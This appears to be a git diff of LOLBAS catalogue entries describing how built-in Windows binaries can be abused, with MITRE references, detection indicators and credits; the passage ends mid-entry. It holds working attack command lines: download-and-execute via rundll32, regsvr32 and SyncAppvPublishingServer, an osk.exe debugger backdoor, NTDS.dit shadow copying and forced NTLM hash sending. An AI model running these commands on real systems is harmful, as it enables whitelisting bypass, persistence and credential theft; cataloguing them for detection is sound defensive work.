Privileges: User
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
|
||||
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,22 +1,54 @@
|
||||
---
|
||||
Name: Regsvr32.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
- Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1117
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1117
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1117
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
|
||||
Description: Execute the specified local .SCT script with scrobj.dll.
|
||||
Usecase: Execute code from scriptlet, bypass Application whitelisting
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1117
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\regsvr32.exe
|
||||
- C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regsvr32.exe getting files from Internet
|
||||
- IOC: regsvr32.exe executing scriptlet files
|
||||
Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,21 +1,36 @@
|
||||
---
|
||||
Name: Replace.exe
|
||||
Description: Copy, Download
|
||||
Author: ''
|
||||
Description: Used to replace file with another file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy the specified file to the destination folder.
|
||||
Description: Copy file.cab to destination
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Description: Copy the specified file to the destination folder.
|
||||
Description: Download/Copy bar.exe to outdir
|
||||
Usecase: Download file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\replace.exe
|
||||
- C:\Windows\SysWOW64\replace.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Replace.exe getting files from remote server
|
||||
Resources:
|
||||
- https://twitter.com/elceef/status/986334113941655553
|
||||
- https://twitter.com/elceef/status/986842299861782529
|
||||
Notes: Thanks to elceef - @elceef
|
||||
|
||||
- Link: https://twitter.com/elceef/status/986334113941655553
|
||||
- Link: https://twitter.com/elceef/status/986842299861782529
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
@ -1,25 +1,31 @@
|
||||
---
|
||||
Name: Rpcping.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Description: Used to verify rpc connection
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: rpcping -s 127.0.0.1 -t ncacn_np
|
||||
Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
|
||||
- Command: rpcping -s 192.168.1.10 -ncacn_np
|
||||
Description: Send a RPC test connection to the target server (-s) sending the password hash in the process.
|
||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
Usecase: Capture credentials on a non-standard port
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\rpcping.exe
|
||||
- C:\Windows\SysWOW64\rpcping.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/subtee/status/872797890539913216
|
||||
- https://github.com/vysec/RedTips
|
||||
- https://twitter.com/vysecurity/status/974806438316072960
|
||||
- https://twitter.com/vysecurity/status/873181705024266241
|
||||
Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity
|
||||
|
||||
- Link: https://github.com/vysec/RedTips
|
||||
- Link: https://twitter.com/vysecurity/status/974806438316072960
|
||||
- Link: https://twitter.com/vysecurity/status/873181705024266241
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Vincent Yiu
|
||||
Handle: '@vysecurity'
|
||||
---
|
@ -1,32 +1,70 @@
|
||||
---
|
||||
Name: Rundll32.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
Usecase: Execute dll file
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Execute code from alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\rundll32.exe
|
||||
- C:\Windows\SysWOW64\rundll32.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,20 +1,28 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Runonce.exe /AlternateShellStartup
|
||||
Description: Executes a Run Once Task that has been configured in the registry.
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
Usecase: Persistence, bypassing defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\runonce.exe
|
||||
- c:\windows\sysWOW64\runonce.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/990717080805789697
|
||||
- https://cmatskas.com/configure-a-runonce-task-on-windows/
|
||||
Notes: |
|
||||
Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
Requires Administrative access.
|
||||
- Link: https://twitter.com/pabraeken/status/990717080805789697
|
||||
- Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
@ -1,17 +1,28 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Description: Execute the PowerShell script named test.txt.
|
||||
Description: Execute the PowerShell script named test.txt
|
||||
Usecase: Bypass constrained language mode and execute Powershell script
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe '
|
||||
- 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Event 4014 - Powershell logging
|
||||
- IOC: Event 400
|
||||
Resources:
|
||||
- https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
|
||||
Notes: Thanks to Matt Graeber - @mattifestation
|
||||
- Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
@ -1,19 +1,27 @@
|
||||
---
|
||||
Name: SC.exe
|
||||
Description: Execute, Read ADS, Create Service, Start Service
|
||||
Author: ''
|
||||
Name: Sc.exe
|
||||
Description: Used by Windows to manage services
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: |
|
||||
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
|
||||
sc start evilservice
|
||||
Description: ''
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
Usecase: Execute binary file hidden inside an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\sc.exe
|
||||
- C:\Windows\SysWOW64\sc.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
Resources:
|
||||
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,21 +1,37 @@
|
||||
---
|
||||
Name: Scriptrunner.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Scriptrunner.exe -appvscript calc.exe
|
||||
Description: Execute calc.exe.
|
||||
Description: Executes calc.exe
|
||||
Usecase: Execute binary through proxy binary to evade defensive counter measurments
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
|
||||
Description: Execute the calc.cmd script on the remote share.
|
||||
Description: Executes calc.cmde from remote server
|
||||
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\scriptrunner.exe
|
||||
- c:\windows\sysWOW64\scriptrunner.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\scriptrunner.exe
|
||||
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||
Resources:
|
||||
- https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||
- https://twitter.com/NickTyrer/status/914234924655312896
|
||||
- https://github.com/MoooKitty/Code-Execution
|
||||
Notes: Thanks to Nick Tyrer - @NickTyrer
|
||||
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||
- Link: https://twitter.com/NickTyrer/status/914234924655312896
|
||||
- Link: https://github.com/MoooKitty/Code-Execution
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@nicktyrer'
|
||||
---
|
@ -1,16 +1,27 @@
|
||||
---
|
||||
Name: SyncAppvPublishingServer.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Used by App-v to get App-v server lists
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
|
||||
Description: Example command on how inject Powershell code into the process
|
||||
Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||
Resources:
|
||||
- https://twitter.com/monoxgas/status/895045566090010624
|
||||
Notes: Thanks to Nick Landers - @monoxgas
|
||||
- Link: https://twitter.com/monoxgas/status/895045566090010624
|
||||
Acknowledgement:
|
||||
- Person: Nick Landers
|
||||
Handle: '@monoxgas'
|
||||
---
|
@ -1,20 +1,28 @@
|
||||
---
|
||||
---
|
||||
Name: Wab.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Windows address book manager
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Wab.exe
|
||||
Description: Loads a DLL configured in the registry under HKLM.
|
||||
- Command: wab.exe
|
||||
Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
|
||||
Usecase: Execute dll file. Bypass defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'C:\Program Files\Windows Mail\wab.exe '
|
||||
- 'C:\Program Files (x86)\Windows Mail\wab.exe '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: WAB.exe should normally never be used
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||
- https://twitter.com/Hexacorn/status/991447379864932352
|
||||
Notes: |
|
||||
Thanks to Adam - @Hexacorn
|
||||
Requires registry changes, Requires Administrative Access
|
||||
- Link: https://twitter.com/Hexacorn/status/991447379864932352
|
||||
- Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
@ -1,46 +1,85 @@
|
||||
---
|
||||
Name: WMIC.exe
|
||||
Description: Reconnaissance, Execute, Read ADS
|
||||
Author: ''
|
||||
Name: Wmic.exe
|
||||
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: wmic.exe process call create calc
|
||||
Description: Execute calc.exe.
|
||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
|
||||
- Command: wmic.exe useraccount get /ALL
|
||||
Description: List the user accounts on the machine.
|
||||
- Command: wmic.exe process get caption,executablepath,commandline
|
||||
Description: Gets the command line used to execute a running program.
|
||||
- Command: wmic.exe qfe get description,installedOn /format:csv
|
||||
Description: Gets a list of installed Windows updates.
|
||||
- Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
|
||||
Description: Check to see if the target system is running SQL.
|
||||
- Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"
|
||||
Description: Use the PowerShell cmdlet to list the shares on a remote server.
|
||||
- Command: wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe process call create calc
|
||||
Description: Execute calc from wmic
|
||||
Usecase: Execute binary from wmic to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
||||
Description: Execute evil.exe on the remote system.
|
||||
Usecase: Execute binary on a remote system
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
|
||||
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
|
||||
Usecase: Execute binary with scheduled task created with wmic on a remote computer
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
|
||||
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
||||
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
||||
Description: Execute a script contained in the target .XSL file hosted on a remote server.
|
||||
